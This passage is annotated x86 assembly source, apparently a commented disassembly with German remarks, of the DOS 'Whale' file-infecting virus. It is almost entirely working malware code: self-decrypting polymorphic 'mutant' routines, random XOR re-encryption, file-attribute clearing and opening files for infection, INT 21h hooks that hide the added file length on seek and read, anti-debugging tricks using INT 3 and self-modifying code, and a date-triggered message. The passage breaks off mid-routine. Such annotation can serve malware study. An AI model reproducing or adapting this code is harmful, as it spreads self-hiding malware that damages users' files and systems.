+
+J03F52: POP DX
+J03F53: CALL J03F4A
+ JZ J03F86
+ JMP J03F53
+
+J03F5A: PUSH DX
+ ;-------( einsprung )--------------
+ PUSH CS
+J03F5C: POP DS
+ CALL J03F83 ; DX =
+J03F60: SUB DX,23A0h ; DX =
+ MOV BX,DX ; BX =
+ MOV CX,8423h
+ XCHG CL,CH ; CX = 2384
+J03F6B: CALL J03F4A
+ JNZ J03F6B ; LOOP
+ XCHG AX,DX ; AX =
+ MOV DX,BX ; BX = , DX = BX +
ADD DX,008Eh ; DX =
+ XCHG DX,BX ; BX = , DX =
+ DEC BYTE Ptr DS:[BX]
+ POP DX ; DX = ????
+ JZ J03F85
+ PUSH ES
+ POP DS ; DS = ES
+ PUSH AX
+ XOR AX,AX ; AX = 0
+J03F83: POP DX ; DX =
+ PUSH DX
+J03F85: RETN ; JMP 2831
+;---------------------------------------------------------------
+J03F86: POP DX ;
+ POP BX
+ POP CX
+J03F89:
+ CALL_INT21 7,mut_7
+ XLAT ; MOV AL,[BX+AL]
+ CLC
+J03F8E: JMP J03F5A
+;=====================================================================
+;===================================================( MUTANT # 12 )===
+;=====================================================================
+mut_12 EQU $
+ JMP SHORT J03FA0 ; = OFFSET 4BB5
+
+J03F92: POP BX
+ MOV AH,40h
+ POP CX
+ CALL_INT21 12,mut_12
+;==========================================================
+J03F99: JMP SHORT J03FA7
+
+J03F9B: POP BX
+ PUSH CS
+ POP DS
+ PUSH BX
+ RETN
+
+J03FA0: CALL J03FCC
+ JNZ J03FA0
+ JMP J03F92
+
+ ;-------( einsprung )--------------
+J03FA7: CALL J03F9B
+J03FAA: MOV CX,239Fh ; BX = ; DS = CS
+ SUB BX,CX ; CX =
+ SUB CX,+1Ah ; CX =
+J03FB2: CALL J03FCC
+ JNZ J03FB2
+ XOR BYTE Ptr DS:[BX+008Eh],01h
+ JZ J03FCB
+ CALL J03F9B
+J03FC1: SUB BX,23B4h ; BX = , BX <-
+ DEC BX ; BX =
+ MOV AX,CX
+ PUSH BX ;
+ PUSH ES
+ POP DS
+J03FCB: RETN ; = JMP 2831
+
+J03FCC: PUSH [BX]
+ POP AX
+ XOR [BX+02h],AL
+ XOR [BX+01h],AL
+ ADD BX,+03h
+ SUB CX,+03h
+ RETN
+;=====================================================================
+;===================================================( MUTANT # 11 )===
+;=====================================================================
+Mut_11 EQU $
+ JMP SHORT J03FEC ; = OFFSET 4BB5
+
+J03FDE: POP BX
+ POP CX
+ MOV AH,40h
+ CALL_int21 11,mut_11
+ JMP SHORT J03FF3
+
+J03FE7: POP BX
+ PUSH BX
+ PUSH CS
+ POP DS
+J03FEB: RETN
+
+J03FEC: CALL J04019
+ JNZ J03FEC
+ JMP J03FDE
+
+ ;-------( einsprung )--------------
+J03FF3: CALL J03FE7
+J03FF6: MOV AX,239Fh ; BX =
+ SUB BX,AX ; BX =
+ MOV CX,001Ah ; CX =
+ XOR CX,AX ; CX = 2385
+J04000:
CALL J04019
+ JNZ J04000
+ XOR BYTE Ptr DS:[BX+008Eh],01h
+ JZ J03FEB
+ CALL J03FE7
+J0400F: SUB BX,23B7h ; BX <-
+ PUSH BX ; RET
+ PUSH ES
+ MOV AX,CX
+ POP DS
+ RETN
+
+J04019: MOV AH,[BX]
+ XOR [BX+01h],AH
+ XOR [BX+02h],AH
+ ADD BX,+03h
+ SUB CX,+03h
+ RETN
+;=====================================================================
+;====================================================( MUTANT # 14)===
+;=====================================================================
+Mut_14 EQU $
+ JMP SHORT J04042 ; = OFFSET 4BB5
+
+J0402A: POP AX
+ MOV BX,AX
+ POP AX
+ PUSH SI
+ MOV CX,AX
+ PUSH word ptr DS:[@INT21]
+ MOV AX,4000h ; Schreiben !
+
+ POP SI
+ CALL SI ; CALL INT 21h
+ POP SI
+ STC
+ NOP
+ CLC
+ ;-------( einsprung )--------------
+ JMP J04049
+
+J04042: INC BYTE Ptr DS:[BX]
+ INC BX
+ LOOP J04042
+ JMP J0402A
+
+J04049: CALL J0406E
+ MOV CX,Code_Len
+ SUB BX,23A9h
+J04053: DEC BYTE Ptr DS:[BX]
+ INC BX
+ LOOP J04053
+
+ PUSH BP
+ MOV BP,BX
+ ADD BP,008Eh
+ XOR AX,AX
+ CMP BYTE PTR [BP+00h],01h
+ POP BP
+ JZ J04072
+ PUSH ES
+ POP DS
+ JMP_entry 14,mut_14
+
+J0406E: PUSH CS
+J0406F: POP DS
+ POP BX
+ PUSH BX
+J04072: RETN
+
+ DB 0CDh
+;=====================================================================
+;====================================================( MUTANT # 10)===
+;=====================================================================
+mut_10 EQU $
+ PUSH AX
+ DEC CL
+ JMP SHORT J0408F
+
+J04079: MOV AL,[BX]
+ INC BX
+ MOV AH,[BX]
+ XCHG AL,AH
+ MOV [BX-01h],AL
+ DEC CX
+ MOV [BX],AH
+ INC BX
+ XOR AX,AX
+ DEC CX
+J0408A: RETN
+
+ ;-------( einsprung )--------------
+J0408B: PUSH CS
+ POP DS
+ JMP SHORT J040A2
+
+J0408F: CALL J04079
+ CLC
+ JNZ J0408F
+ POP AX
+ POP BX
+ POP CX
+
+ PUSH BP
+ PUSH word ptr DS:[@INT21]
+ POP BP
+ CALL DS:BP ; CALL Int 21H
+ POP BP
+J040A2: CALL J040A5
+J040A5: MOV CX,2384h ; CX = 2384
+ POP BX ; BX = 40A5
+ SUB BX,23B6h ; BX = 1cef
+J040AD: CALL J04079
+ JNZ J040AD
+ CMP BYTE Ptr DS:[BX+008Fh],01h
+ CLD
+ JZ J0408A
+
PUSH ES
+J040BB: POP DS
+ JMP_ENTRY 10,mut_10
+ DB 089h
+;=====================================================================
+;====================================================( MUTANT # 29)===
+;=====================================================================
+Mut_29 EQU $
+ DEC CX ; = OFFSET 4BB5
+ PUSH AX
+ JMP SHORT J040DB
+
+J040C4: MOV AL,[BX]
+ INC BX
+ MOV AH,[BX]
+ XCHG AH,AL
+ MOV [BX-01h],AL
+ MOV [BX],AH
+ INC BX
+ XOR AX,AX
+ SUB CX,+02h
+J040D6: RETN
+
+ ;-------( einsprung )--------------
+J040D7: PUSH CS
+ POP DS
+ JMP SHORT J040F0
+
+J040DB: CALL J040C4
+ JNZ J040DB
+ POP AX
+ POP BX
+ STI
+
+ POP CX
+ PUSH word ptr DS:[@INT21]
+ POP word ptr DS:[D259A]
+ CALL WORD PTR DS:[D259A] ; CALL INT 21H
+J040F0: CALL J040F3
+J040F3: POP BX ; BX =
+ SUB BX,23B8h ; BX =
+ MOV CX,2384h ; CX = 2384
+J040FB: CALL J040C4
+ JNZ J040FB
+ CMP BYTE Ptr DS:[BX+008Fh],01h
+ JZ J040D6
+J04107: PUSH ES
+ POP DS
+ JMP_ENTRY 29,mut_29
+;=====================================================================
+;====================================================( MUTANT # 15)===
+;=====================================================================
+mut_15 EQU $
+ PUSH DX ; = OFFSET 4BB5
+ MOV DH,[BX-01h]
+ PUSH AX
+J04111: MOV DL,[BX]
+ DEC DH
+ XOR [BX],DH
+ XCHG DH,DL
+ ADD BX,+01h
+ LOOP J04111
+ POP CX
+ POP AX
+ JMP J04128
+
+ ;-------( einsprung )--------------
+J04123: CALL J04126
+J04126: JMP SHORT J04135
+
+J04128: MOV DX,AX
+ POP AX
+ MOV BX,AX
+ POP AX
+ XCHG AX,CX
+
+ CALL DS:[@INT21] ; CALL INT 21
+ JMP J04123
+
+J04135: POP BX ; BX =
+ MOV CX,Code_Len ; CX = 2385
+ PUSH CS
+ SUB BX,239Fh ; BX =
+ POP DS
+
+J0413F: MOV AL,[BX-01h]
+ DEC AL
+ XOR [BX],AL
+ INC BX
+ LOOP J0413F
+ CMP BYTE Ptr DS:[BX+008Eh],01h ;
+ JNZ J04151
+ RETN
+
+J04151: PUSH ES
+ XOR AX,AX
+ POP DS
+ JMP_ENTRY 15,mut_15
+;=====================================================================
+;=====================================================( MUTANT #6 )===
+;=====================================================================
+mut_6 EQU $
+ DEC CL ; = OFFSET 4BB5
+J0415A: XOR BYTE Ptr DS:[BX],67h
+ INC BX
+ DEC CX
+ INC BX
+ DEC CX
+ JNZ J0415A
+
+ PUSH word ptr DS:[@INT21]
+ POP word ptr DS:[D2598+1]
+ POP BX
+ POP CX
+ JMP SHORT J04172
+
+ ;-------( einsprung )--------------
+J0416F: CALL J041A1
+J04172: CALL WORD PTR DS:[D2598+1] ; == call Int 21
+ JMP J0416F
+
+J04178: MOV AX,0002h ; AX = 0002
+ ADD BX,0DD61h ; BX =
+ DEC BH ; BX =
+ MOV CX,2184h ; CX = 2184
+ PUSH CS
+ XOR CH,AL ; CX = 2386
+ POP DS
+
+J04188: XOR BYTE Ptr DS:[BX],67h
+ DEC CX
+ ADD BX,AX ; Jedes 2 byte verXORen
+ DEC CX
+ JNZ J04188 ; 11C3 (!!!) mal :)
+
+ ADD BX,008Fh ; BX =
+ DEC BYTE Ptr DS:[BX];
+ PUSH ES
+ POP DS
+ JNZ J0419C ; <- BX+8E
+ RETN
+
+J0419C: MOV AX,CX
+ JMP_ENTRY 6,mut_6
+
+J041A1: POP BX
+ JMP J04178
+;=====================================================================
+;====================================================( MUTANT # 25)===
+;=====================================================================
+mut_25 EQU $
+ DEC CX ; = OFFSET 4BB5
+J041A5: XOR BYTE Ptr DS:[BX],0E8h
+ ADD BX,+02h
+ SUB CX,+02h
+ JNZ J041A5
+ POP BX
+ PUSH word ptr DS:[@INT21]
+ POP word ptr DS:[D2598]
+ JMP SHORT J041BE
+
+ ;-------( einsprung )--------------
+J041BB: CALL J041EC
+J041BE: POP CX
+
+ CALL [D2598]
+ JMP J041BB
+
+J041C5: MOV AX,0002h ; AX = 2,BX =
+ ADD BX,0DC61h ; BX =
+ MOV CX,2386h ; CX = 2386
+ PUSH CS
+ XOR CX,AX ; CX = 2384
+ POP DS
+J041D3: XOR BYTE Ptr DS:[BX],0E8h
+ ADD BX,AX
+ SUB CX,AX
+ JNZ J041D3
+ ; BX =
+ ADD BX,008Fh ; BX =
+ DEC BYTE Ptr DS:[BX]
+ PUSH ES
+ POP DS
+ JNZ J041E7
+ RETN
+
+J041E7: MOV AX,CX
+ JMP_entry 25,mut_25
+
+J041EC: POP BX
+ JMP J041C5
+
+ db 33h
+;=====================================================================
+;=====================================================( MUTANT #4 )===
+;=====================================================================
+mut_4 EQU $
+ PUSH DX ; =
OFFSET 4BB5
+ MOV DH,[BX-01]
+J041F4: MOV DL,[BX]
+ XOR [BX],DH
+ XCHG DH,DL
+ ADD BX,+01h
+ LOOP J041F4
+ POP DX
+ STI
+ POP BX
+ POP CX
+
+ CALL DS:[@INT21] ; CALL Int 21
+ ;----( einsprung )----
+ CALL J0420D
+J0420A: INC AX
+ XOR BX,SI
+J0420D: OR SI,SI
+ INC BH
+ POP BX ; BX =
+ SUB BX,23A1h ; BX =
+ ADD BX,+02h ; BX =
+ MOV CX,2485h
+ DEC CH ; CX = 2385
+ PUSH CS
+ POP DS
+J04220: MOV AL,[BX-01h]
+ XOR [BX],AL
+ INC BX
+ LOOP J04220
+ ; BX =
+ ADD BX,008Eh ; BX =
+ XCHG BX,SI
+ DEC BYTE Ptr DS:[SI]
+ JNZ J04235
+ XCHG SI,BX
+ RETN
+
+J04235: PUSH ES
+ XOR AX,AX
+ POP DS
+ JMP_ENTRY 4,mut_4
+;=====================================================================
+;====================================================( MUTANT #13 )===
+;=====================================================================
+mut_13 EQU $
+ PUSH DX ; = OFFSET 4BB5
+ MOV DH,[BX-01h]
+J04240: MOV DL,[BX]
+ ADD [BX],DH
+ XCHG DL,DH
+ INC BX
+ LOOP J04240
+
+ POP DX
+ POP BX
+ POP CX
+ PUSH SI
+ MOV SI,2567h
+
+ DEC SI
+ CALL [SI]
+ ;--------( einsprung ) ------
+ CALL J04258
+ XOR BX,SI
+J04258: XOR SI,1876h
+ POP BX
+ POP SI
+ SUB BX,Code_start ; BX = 2830
+ MOV CX,Code_Len ; CX = 2385 wal-size
+ PUSH CS
+ POP DS
+J04267: MOV AL,[BX-01h]
+ SUB [BX],AL
+ INC BX
+ LOOP J04267
+ ADD BX,008Eh
+ XCHG SI,BX
+ DEC BYTE Ptr DS:[SI]
+ JNZ J0427C
+ XCHG BX,SI
+ RETN
+
+J0427E equ $+3 ; SPRUNGZIEL FR M#19, zeigt auf L0L0L0
+J0427C: PUSH ES
+ XOR AX,AX
+ POP DS
+ JMP_ENTRY 13,mut_13
+
+ DW 0CE8BH
+ DW 05605H
+ DB 34H
+;=====================================================================
+;====================================================( MUTANT # 19)===
+;=====================================================================
+mut_19 EQU $
+ PUSH AX ; = OFFSET 4BB5
+J04289: XOR BYTE Ptr DS:[BX],05h
+ INC BYTE Ptr DS:[BX]
+ INC BX
+ LOOP J04289
+ POP AX
+ INC BX
+ INC CX
+ STD
+ STC
+ PUSH AX
+ XLAT ; MOV AL,[BX+AL]
+ POP AX
+ POP BX
+ POP CX
+
+ CALL DS:[@INT21] ; CALL INT 21h
+ ;-------(
einsprung )--------------
+ CALL J042A5
+
+J042A2: MOV BX,5601h
+J042A5: POP BX ; BX =
+ SUB BX,239Fh ; BX =
+ MOV CX,8934h
+ MOV CX,code_len ; CX = 2385
+ PUSH CS
+ PUSH AX
+ MOV AX,0000h
+ MOV DS,AX
+ POP AX
+ POP DS ; DS=CS !
+J042B9: DEC BYTE Ptr DS:[BX]
+ XOR BYTE Ptr DS:[BX],05h
+ INC BX
+ LOOP J042B9
+ MOV CX,0023h
+ DEC BYTE Ptr DS:[BX+008Eh]
+ JZ J0427E
+
+ PUSH ES
+ MOV CX,0000h
+ POP DS
+ JMP_ENTRY 19,mut_19
+
+ DW 0FBC3h
+;=====================================================================
+;=====================================================( MUTANT #2 )===
+;=====================================================================
+Mut_2 EQU $
+ PUSH AX ; = OFFSET 4BB5
+ XLAT ; MOV AL,[BX+AL]
+J042D6: XOR BYTE Ptr DS:[BX],10h
+ ADD BX,+01h
+ LOOP J042D6
+ POP AX
+ POP BX
+ POP CX
+ PUSH SI
+ MOV SI,Offset @INT21
+ CLC
+
+ CALL [SI] ; CALL Int 21
+ CLC
+ POP SI
+ INC BX
+ ;-------( einsprung )--------------
+ CALL J04317
+
+J042EE: SUB BX,239Fh ; BX =
+ MOV CX,2387h
+ DEC CX
+ STC
+ DEC CX ; CX = 2385
+
+J042F8: XOR BYTE Ptr DS:[BX],10h
+ ADD BX,+01h
+ LOOP J042F8
+ ; BX =
+ MOV CX,BX
+ MOV CX,008Eh
+ ADD BX,CX ; BX =
+ DEC BYTE Ptr DS:[BX]
+ JZ J0430D
+ JMP SHORT J0430E
+
+J0430D: RETN
+
+J0430E: PUSH ES
+ MOV AX,0000h
+ POP DS
+ CLC
+ JMP_ENTRY 2,mut_2
+ ;----------------
+J04317: POP BX
+ PUSH BX
+ PUSH CS
+ PUSH CX
+ STC
+ POP CX
+ POP DS
+ CLC
+ RETN
+;=====================================================================
+;======================================================( MUTANT #9)===
+;=====================================================================
+Mut_9 EQU $
+J04320: ADD BYTE Ptr DS:[BX],05h ; = OFFSET 4BB5
+ ADD BX,+01h
+ LOOP J04320
+ POP BX
+ INC CX
+ POP CX
+ PUSH SI
+ MOV SI,Offset @INT21
+
+ CALL [SI] ; CALL INT 21
+ CLC
+ POP SI
+ INC DX
+ PUSH AX
+ POP DX
+ NOP
+ ;-------( einsprung )--------------
+ CALL J0433B
+J0433A: CLC
+J0433B: POP BX ; BX =
+ SUB BX,239Fh ; BX =
+ MOV CH,23h
+ MOV CL,85h ; CX = 2385
+ CALL J04360 ;
DS = CS
+
+J04347: SUB BYTE Ptr DS:[BX],05h
+ INC BX
+ CLC
+ ADD DX,+12h
+ LOOP J04347
+ ADD BX,008Eh ; BX =
+ DEC BYTE Ptr DS:[BX]
+ JNZ J04364
+ RETN
+
+ INC BX
+ ADD CX,0D7Ah
+ XLAT ; MOV AL,[BX+AL]
+J04360: PUSH CS
+ POP DS
+ RETN
+
+ DB 0A4H
+J04364: PUSH ES
+ POP DS
+ JMP_Entry 9,mut_9
+ DB 25H
+ DB 26H
+ DB 85h
+;=====================================================================
+;========================================( Kodiert 1274h... 1B5Ch )===
+;========================================( == 3A84 .. 436Ch )===
+;=====================================================================
+Code_3A84: MDECODE 68
+J04371: MOV BX,Offset J03A84-Offset VirStart ; 1274h
+ MOV CX,Offset Code_3A84-Offset J03A84 ; 08E8h
+J04377: IN AL,40h
+ OR AL,00h
+ JZ J04377
+
+J0437D: XOR CS:[BX],AL
+ INC BX
+ LOOP J0437D
+
+ CALL J04386
+J04386: POP BX
+ ADD BX,OFFSET XORBYTE_7D - Offset J04386 ; +1E
+ ; GEGENSTUECK IST DORT !
+ MOV CS:[BX],AL
+ MCODE 68
+ RETN
+;=====================================================================
+;======================================( Dekodiert 1274h... 1B5Ch )===
+;=====================================================================
+Decode_3A84: MOV BX,Offset J03A84-Offset VirStart ; 1274h
+ MOV CX,Offset Code_3A84-Offset J03A84 ; 08E8h
+ ;CALL J04984 ; wie ist es mit dem RET ???
+ CALL J043A1 ; muesste CALL 43A1 heissen .
+
+ DB 90h
+ DB 70h
+ db 90h
+ db 91h
+ db 7dh
+ db 73h
+
+J043A1: XOR BYTE PTR CS:[BX],00 ; <---- !
+
+XORBYTE_7D EQU $-1 ; !!!!!!!!
+
+ INC BX
+ LOOP J043A1
+ RETN
+;======================================================================
+ DB 02eh,0c7h,006h,099h
+ DB 007h,000h,000h,0e8h
+;==================================================================
+;===========================================( Vorarbeiten )========
+;==================================================================
+J043B1: MDECODE 69
+ CALL Trace_int_13h
+ PUSH DX
+ MOV AH,36h ; Get free Space on Disk
+ MOV DL,CS:[D2428] ; DL = Disk
+ CALL CS:[@INT21]
+ MUL CX
+ MUL BX ; AX*BX*CX = Free space in Byte
+ MOV BX,DX ; DX = Total Clusters on disk
+ POP DX
+ OR BX,BX
+ MCODE 69
+ JNZ J043DA
+
+J043D5: CMP AX,4000h
+ JB J0443D
+
+J043DA: MOV AX,4300h ; GET FILE-ATTRIBUT
+ CALL CS:[@INT21]
+ JB J0443D
+
+ MDECODE 70
+ MOV CS:[D24F4],DX ; Offset Filename
+ MOV CS:[D24F2],CX ; File-Attribut
+ MOV CS:[D24F6],DS ; Segment Filename
+
+ MOV AX,4301h ; SET File-Attribut
+ XOR CX,CX
+ CALL CS:[@INT21]
+ CMP BYTE PTR CS:[Error],00h
+
+ MCODE 70
+ JNZ J0443D
+
+ MOV AX,3D02h ; OPEN FILE / HANDLE
+ CALL CS:[@INT21]
+ JB J0443D
+
+ MDECODE 71
+ MOV BX,AX ; HANDLE NACH BX
+ PUSH BX
+ MOV AH,32h ; GET DISK INFO
+ MOV DL,CS:[D2428] ; DRIVE NR.
+ CALL CS:[@INT21]
+ MOV AX,[BX+1Eh] ; DS:BX : DISK-INFO-BLOCK
+ MOV CS:[D24EC],AX
+ POP BX
+ CALL J048CD
+ MCODE 71
+ RETN
+ DB 0B4h
+;=================================================( Fehler melden )===
+J0443D: MDECODE 72
+ xor bx,bx
+ dec bx ; BX = 0ffffh
+ call J048CD
+ MCODE 72
+ ret
+;=====================================================================
+;================================================( INT 24-Handler )===
+;=====================================================================
+J0444D: MDECODE 73
+ XOR AL,AL
+ MOV BYTE PTR CS:[Error],01h
+ MCODE 73
+ IRET
+ DB 8Ch
+;=====================================================================
+;==================================( Checkt die Uhrzeit des Files )===
+;=====================================================================
+CheckFileTime: MDECODE 74
+ PUSH CX
+ PUSH DX
+ PUSH AX
+ MOV AX,4400h ; Get IOCTL-Dev.Info
+ CALL CS:[@INT21] ; Handle in BX
+ XOR DL,80h ; DL and 80h = 1: Device,
+ ; DL and 80h = 0: Diskfile
+ TEST DL,80h ;
+ JZ J04483 ; es war KEIN Diskfile !
+
+ MOV AX,5700h ; Get File-Timestamp
+ CALL CS:[@INT21]
+ TEST CH,80h ; Stunde >= 16 ?
+J04483: POP AX
+ POP DX
+ POP CX
+ MCODE 74
+ RETN
+ DB 0F6h
+;=====================================================================
+;======================( von INT 3/21h angesprungen, falls AH=40h )===
+;=====================================================================
+J0448C: CMP Word PTR CS:[D2581],4 ; FILEHANDLE
+ JB J044BA ; KEIN FILE !
+ PUSH CS
+ POP BX
+ SUB BH,20h ; 2 Segmente vor CS
+ MOV AX,CS:[D257B] ; AX := SAVE-DS
+ CMP AX,BX ; Ist SAVE-DS hher
+ JB J044BA ; als D257B, z.B.
das
+ MOV CS:[D257B],BX ; DS des COMMAND.COM
+ JMP SHORT J044BA
+ DB 0E8h
+;=====================================================================
+;=================================( von INT 3=INT 21 angesprungen )===
+;=====================================================================
+J044A9: SUB BYTE PTR CS:[SwapCode_7],52h
+ PUSH CS:[D2579] ; SAVE-AX
+ POP CX
+ CMP CH,40h ; WRITE File
+ ;=============================================================
+ ;durch das obige "SUB BYTE PTR CS:[1CA8h]" wird folgender Code
+ ;=============================================================
+SwitchByte EQU $
+ DB 0C6h ; aus 0c6h wird 074h, Spiel mit Queue!
+ DB 0D2H ; es sind genau 8 Byte dazwischen.....
+ ;=============================================================
+ ; folgendermassen verndert :
+ ;=============================================================
+ ; JZ J0448C
+ ;=============================================================
+J044BA:
+ POP Word Ptr DS:[000Eh] ; INT 3 restaurieren
+ POP Word Ptr DS:[000Ch]
+ ADD BYTE PTR CS:[SwapCode_7],52h
+ CALL RestoreRegs
+ JMP J02AFB
+;=====================================================================
+;=================================================( Get File-Size )===
+;=====================================================================
+GetFileSize: MDECODE 75
+ CALL SaveRegisters
+
+ XOR CX,CX
+ MOV AX,4201h ; SEEK von momentaner Position
+ XOR DX,DX ; 0 (!)
byte weiter
+ CALL CS:[@INT21]
+ MOV Word ptr CS:[FilePos+2],DX
+ ; in DX:AX ist neue/alte Position
+ MOV Word ptr CS:[FilePos ],AX
+
+ MOV AX,4202h ; SEEK zum File-Ende
+ XOR CX,CX
+ XOR DX,DX
+ CALL CS:[@INT21]
+
+ MOV Word ptr CS:[FileSize+2],DX ; File-Laenge zurck
+ MOV Word ptr CS:[FileSize ],AX
+
+ MOV AX,4200h ; SEEK zur alten Position
+ MOV DX,Word ptr CS:[FilePos ]
+ MOV CX,Word ptr CS:[FilePos+2]
+ CALL CS:[@INT21]
+
+ CALL GetRegsFromVirstack
+ MCODE 75
+ RETN
+;=====================================================================
+;======================================( INT 3 aus INT 21-Handler )===
+;=====================================================================
+J0451A: POP AX ; POP IP
+ POP BX ; POP CS
+ POP CX ; POP Flags
+ JMP J044A9
+;=====================================================================
+;=================================( Handler fr Get/Set Filedatum )===
+;=====================================================================
+J0451F: OR AL,AL ; GET File-Date ??
+ JNZ J04550 ; Nein, SET !
+ ;---------------------------------( get file-date )---
+ MDECODE 76
+ AND WORD PTR CS:[D24B3],0FFFEH ; clear CF
+ CALL PopALL
+ CALL CS:[@INT21]
+ MCODE 76
+ JB J04547
+ TEST CH,80h ; FILE-STUNDE > 16 ?
+ JZ J04544
+ SUB CH,80h ; Wenn ja, 16 abziehen
+J04544: JMP IRET_Int21h ; INT 21 beenden
+ ;------------------------------------------------------
+J04547: OR WORD PTR CS:[D24B3],+01h; SET CF des Callers
+ JMP IRET_Int21h
+ ;----------------------------------( set file-date )---
+J04550: CMP AL,01h ; ist es 'set file date' ?
+ JNZ J045CD ; Fehler im Walcode!
+ ; CALL LOW-INT-21
+ MDECODE 77
+ AND WORD PTR CS:[D24B3],0FFFEH ; CF lschen
+ TEST CH,80h ; Stunde > 16 ?
+ MCODE 77
+ JZ J0456B ; nein
+ SUB CH,80h ; 16 abziehen
+J0456B: CALL CheckFileTime
+ JZ J04573 ; kein DISK-File,
+ ; oder Stunde < 16
+ ADD CH,80h ; sonst 16 addieren
+ ;-----------------
+J04573: MDECODE 78
+ CALL CS:[@INT21]
+ MOV [BP-04h],AX ; Errorcode
+ ADC WORD PTR CS:[D24B3],+00h; = CLC
+ MCODE 78
+ JMP J02EA3 ; fertig
+;=====================================================================
+;=====================================( gehrt zum INT 21-Handler )===
+;=====================================================================
+J0458D: CALL SaveRegs
+ IN AL,21h
+ OR AL,02h
+ OUT 21h,AL
+ PUSH AX
+ MOV AX,0000h
+ MOV DS,AX
+ POP AX
+ PUSH Word Ptr DS:[000Ch] ; HOLE INT 3-Offset
+ PUSH Word Ptr DS:[000Eh] ; HOLE INT 3-Segment
+ PUSH CS
+ POP Word Ptr DS:[000Eh] ; Setze INT 3 auf
+ ; CS:01D0A / CS:451A
+ MOV WORD Ptr DS:[000Ch],OFFSET J0451A-Offset VirStart
+ INT 3 ; ** tricky **
+;---------------------------------------------------------------------
+ DB 83h
+;=====================================================================
+;=====================================( Handler fr SEEK / Handle )===
+;=====================================================================
+J045B2: MDECODE 79
+J045B7: CMP AL,02h ; Seek File-ENDE ??
+ JNZ J045C9 ; alles andere ist uninteressant
+ CALL CheckFileTime ; Ja ...
+ JZ J045C9
+ SUB WORD Ptr [BP-0Ah],Code_len
+ SBB WORD Ptr [BP-08h],+00h
+J045C9: MCODE 79
+J045CD: JMP J02B8B ; CALL LOW-INT-21
+;=====================================================================
+;=====================================================( AKTIV-MSG )===
+;=====================================================================
+J045D0: MDECODE 80
+ CALL PushALL
+ MOV AH,2Ah ; GET DATE
+ CALL CS:[@INT21]
+ ;==========( Nur zwischen 18.Februar und 21. Mrz )===
+ CMP DH,02h ; MONAT FEBRUAR ?
+ JZ J045EC ; Ja : welcher
+ CMP DH,03h ; Mrz ?
+ JZ J045F4 ; Ja : welcher
+ JMP J04663 ; Nein : fertig
+J045EC: CMP DL,13h ; Nach dem 18. Februar ??
+ JNB J045FC ; JA -> MSG
+ JMP J04663 ; NEIN -> fertig
+
+J045F4: CMP DL,15h ; VOR 21. Mrz ??
+ JB J045FC ; JA : MSG
+ JMP J04663 ; NEIN : Fertig
+J045FC: JMP J0463D
+ ;========================================================
+D45FF: DB "THE WHALE IN SEARCH OF THE 8 FISH",0ah,0dh
+ DB "I AM '~knzyvo}' IN HAMBURG$"
+ ;========================================================
+J0463D: MOV AH,09h
+ PUSH CS
+ POP DS
+ MOV DX,Offset D45FF-Offset VirStart ; 1DFF
+ CALL CS:[@INT21]
+ ;==================================( schreibe HLT )===
+ MOV WORD PTR CS:[D2598],0F4F4h ; = HLT
+ MOV BX,D2598
+ PUSHF
+ PUSH CS
+ PUSH BX
+ XOR AX,AX
+ MOV DS,AX
+ MOV WORD Ptr DS:[0006h],0FFFFh
+ CALL Debugger_Check
+ ;-----------------------------------------------------
+J04663: CALL PopALL
+ MCODE 80
+ RETN
+;=====================================================================
+;=================================( Handler fr READ FILE /Handle )===
+;=====================================================================
+J0466B: JMP J02B8B ; CALL LOW-INT-21
+J0466E: AND BYTE PTR CS:[D24B3],0FEh; CF lschen
+ CALL CheckFileTime
+ JZ J0466B ; entweder kein DISK-File,
+ ; oder 'falsche' Uhrzeit
+ MDECODE 81
+ MOV CS:[D24AD],DX ; Buffer merken
+ MOV CS:[D24AF],CX ; Anzahl merken
+ MOV WORD PTR CS:[D24B1],0000h
+ CALL GetFileSize
+ MOV AX,Word ptr CS:[FileSize ]
+ MOV DX,Word ptr CS:[FileSize+2]
+ SUB AX,Code_len
+ SBB DX,+00h
+ SUB AX,Word ptr CS:[FilePos ]
+ SBB DX,Word ptr CS:[FilePos+2]
+ MCODE 81
+ JNS J046B9 ; Lang genug fr den Wal
+ MOV WORD Ptr [BP-04h],0000h
+ JMP J031E7 ; fertig
+;--------------------------------------------------------------------
+J046B9: MDECODE 82
+ JNZ J046C8 ; JMP if Platz
+ CMP AX,CX ; Mehr als Wal-Lnge ?
+ JA J046C8
+ MOV CS:[D24AF],AX ; Dann eben mehr Byte lesen,
+ ; als verlangt !
+J046C8: MOV CX,WORD PTR CS:[FilePos+2]
+ MOV DX,WORD PTR CS:[FilePos ]
+ OR CX,CX ; Bin ich im 1. Segment ?
+
+ MCODE 82
+ JNZ J046DF ; nein -> JMP
+ CMP DX,+1Ch ; wenigstens hinter
+ ; dem EXE-Header ?
+ JBE J04704 ; JMP, wenn mittendrin !
+;--------------------------------------------------------------------
+;-----------------------------------------------( lese-Schleife )----
+;--------------------------------------------------------------------
+J046DF: MDECODE 83
+ MOV DX,WORD PTR CS:[D24AD] ; Lese in DS:DX
+ MOV AH,3Fh
+ MOV CX,WORD PTR CS:[D24AF] ; Soviele Byte
+ CALL CS:[@INT21]
+ ADD AX,WORD PTR CS:[D24B1] ; Gesamtzahl gelesen
+ MOV [BP-04h],AX
+ MCODE 83
+ JMP J02EA3 ; fertig
+;--------------------------------------------------------------------
+J04704: MOV DI,DX ; Filepos
+ MOV SI,DX
+ ADD DI,WORD PTR CS:[D24AF] ; Anzahl zu lesender byte
+ CMP DI,+1Ch ; Summe < 1Ch ?
+ JB J04717 ; JMP wenn kleiner
+ XOR DI,DI ; DI = 0
+ JMP SHORT J0471C
+;--------------------------------------------------------------------
+ DB 0F7H
+;--------------------------------------------------------------------
+J04717: SUB DI,01CH ; DI ist z.B. 10H.
+ ; SUB DI,1C : DI = FFF4
+ NEG DI ; NEG DI : DI = 000B
+J0471C: MDECODE 84
+ MOV AX,DX
+ MOV DX,Word ptr CS:[FileSize ]
+ MOV CX,Word ptr CS:[FileSize+2]
+
+ ADD DX,+0Fh ; Einen Paragrafen weiter
+ ADC CX,+00h
+
+ AND DX,0FFEFH ; ergibt eine Rundung
+ ; auf volle Paragrafen
+ SUB DX,23FCh ; Wal-Size abziehen
+ SBB CX,+00h
+
+ ADD DX,AX
+ ADC CX,+00h
+
+ MOV AX,4200h ; SEEK from Start
+ CALL CS:[@INT21]
+
+ MOV CX,001Ch
+ SUB CX,DI
+ SUB CX,SI
+
+ MOV AH,3Fh ; READ FILE
+ MOV DX,CS:[D24AD]
+ CALL CS:[@INT21]
+
+ ADD CS:[D24AD],AX
+ SUB CS:[D24AF],AX
+J04767: ADD CS:[D24B1],AX
+
+ XOR CX,CX
